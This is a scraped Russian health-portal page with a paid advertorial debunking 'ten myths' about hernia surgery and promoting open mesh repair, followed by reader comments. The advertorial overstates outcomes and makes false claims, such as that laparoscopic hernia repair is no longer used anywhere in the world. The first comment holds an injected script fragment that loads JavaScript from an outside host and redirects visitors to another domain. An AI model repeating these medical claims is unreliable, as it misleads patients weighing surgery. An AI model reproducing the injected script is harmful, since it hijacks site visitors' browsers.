Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  10 заблуждений о лечении ...  >>  10 заблуждений о лечении грыж
 
Обратная связь
 

10 заблуждений о лечении грыж

Размер шрифта
28 февраля 2012 00:00
  • google_analytics: false
  • Нравится

Как только при ушивании грыж хирурги стали использовать синтетические сетки-протезы, одной проблемой в медицине стало меньше. Во-первых, вероятность ее повторного появления снизилась до 0,5-1%. Во-вторых, появилась возможность проводить такие операции в стационаре одного дня и выписывать пациентов на следующий день. В-третьих, заживают швы безболезненно.

Грыжи

Впрочем, несмотря на то, что операция по Лихтенштейну или «ненатяжная» методика сделала лечение грыж простым и эффективным, среди пациентов до сих пор бытуют заблуждения, с ним связанные. Помочь их развеять мы попросили доктора медицинских наук, профессора, заведующего кафедрой госпитальной хирургии Московской медицинской академии им. И.М. Сеченова Черноокова Александра Ивановича.

Александр Иванович Чернооков

Чернооков Александр Иванович профессор, доктор медицинских наук, заведующий кафедрой госпитальной хирургии №2 Московской медицинской академии им И.М. Сеченова, заведующий хирургическим отделением, руководитель научного отдела клиники Центр Флебологии.

Заблуждение 1. Грыжа не представляет опасности для здоровья.

Грыжа – это выпячивание внутренних органов через отверстие в передней брюшной стенке, образовавшееся в результате дефекта соединительной ткани. Пока грыжа поддается вправлению, ситуация некритична. Но при ее ущемлении орган, вышедший из брюшной полости, оказывается как бы в «капкане»: кровоснабжение в нем резко ухудшается. В конечном итоге это приводит к омертвению тканей и разрыву стенки. Если в ближайшие несколько часов человеку не оказать помощь, исход может быть летальным.

Ущемление паховой грыжи может возникнуть после поднятия тяжестей, чрезмерной нагрузки в спортзале, сильного кашля, натуживания при запоре.

Заблуждение 2. Бандаж помогает избавиться от паховой грыжи.

Ничего подобного. Единственная задача пахового бандажа – не дать внутренним органам выйти из брюшной полости через грыжевые ворота. Избавить от грыжи может только операция.

Использовать бандаж имеет смысл только в том случае, когда хирургическое лечение невозможно. Например, если грыжа появилась во время беременности или у очень пожилого человека, который не может перенести операцию по состоянию здоровья.

Важно иметь в виду, что длительное ношение бандажа может травмировать грыжу, а также провоцировать ее увеличение.

Заблуждение 3. Для профилактики грыжи нужно делать специальную гимнастику.

Такой гимнастики не существует. Причина появления грыжи – слабость соединительной ткани, а гимнастика укрепляет только мышечную.

Заблуждение 4. Операция еще не гарантия того, что грыжа не вернется.

Это заблуждение имело право на существование до тех пор, пока всех больных с грыжами оперировали только «натяжными» методами. А именно: попросту стягивали и сшивали края грыжевых ворот. Частота рецидивов при подобном ушивании грыжи достигала 14%.

Сегодня «золотым стандартом» в удалении паховой грыжи считается «ненатяжная» методика. Вместо того чтобы сшивать края, на грыжевые ворота накладывается «заплатка» – специальный сетчатый имплант. Он не только закрывает дефект, но и укрепляет ослабленную соединительную ткань. Благодаря новой методике, гарантия того, что грыжа больше не появится, достигла почти ста процентов. Дополнительный плюс: пациенты после такой операции быстро восстанавливаются и избавлены от болевого синдрома.

Заблуждение 5. Сетчатый имплант может отторгаться организмом.

Не может. Он изготовлен из биологически инертной полимерной нити, которую наша иммунная система воспринимает «как родную». Со временем имплант прорастает соединительной тканью и становится частью организма.

Заблуждение 6. Сетчатый имплант мешает пациенту, ощущается, как инородное тело.

Такой вопрос иногда задают на форумах люди с разыгравшейся фантазией. Имплант никак не ощущается, не причиняет ни боли, ни дискомфорта. И мешать он тоже не может. И даже на металлодетекторе не звенит.

Заблуждение 7. После операции по поводу паховой грыжи у мужчин снижается потенция.

Ни сама операция по поводу паховой грыжи у мужчин, ни местная, спинальная анестезия никак не влияет на потенцию.

Заблуждение 8. После ушивания грыжи остается большой рубец.

Длина рубца составляет около пяти сантиметров, расположен он в паховой области. Послеоперационная рана зашивается косметическим швом и косметическими нитками, так что уже через год след от рубца можно будет заметить, только если сильно приглядеться.

Заблуждение 9. Лапароскопическая операция лучше, потому что нет разрезов.

Отсутствие разреза в данном случае не является плюсом, а скорее – это минус. Проколы при лапароскопической операции создают новые слабые места в брюшной стенке, сквозь которые может выйти уже послеоперационная грыжа. Проколов много – минимум 3, каждый из них 2-3 сантиметра длиной, а шов после современной операции – всего 5-6 см в паху, косметический.

Есть целый ряд серьезных недостатков: общий наркоз, большая длительность и травматичность операции, возможность развития серьезных осложнений со стороны органов брюшной полости. Но самым серьезным недостатком лапароскопической операции является большее количество рецидивов по сравнению с открытой ненатяжной пластикой. Вот всем мире такие операции для лечения грыж более не применяются. Необходимо сказать, что в настоящее время повальное увлечение лапараскопией прошло. За рубежом золотым стандартом для лечения паховых грыж стала пластика с помощью сетчатого импланта, слишком много явных преимуществ.

Заблуждение 10. После операции полгода нельзя заниматься спортом.

Если речь идет о современных «ненатяжных» методиках, то через две недели после операции пациент может вернуться к нормальному образу жизни. Например, помыть дома пол, вынести мусорное ведро или побежать за автобусом.

Через пару месяцев уже можно ходить в спортзал, а через полгода можно абсолютно все.


 

Имеются противопоказания,
необходима консультация специалиста

Статья опубликована на правах рекламы
  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 23:53

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

2 - Гость

05 декабря 2015 в 22:31

Цитировать   |   Пожаловаться

Пункт 9,непонятен вообще ,кто писал его сам ничего не понял,лапароскопия с сеткой делается сейчас без проблем,.

Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.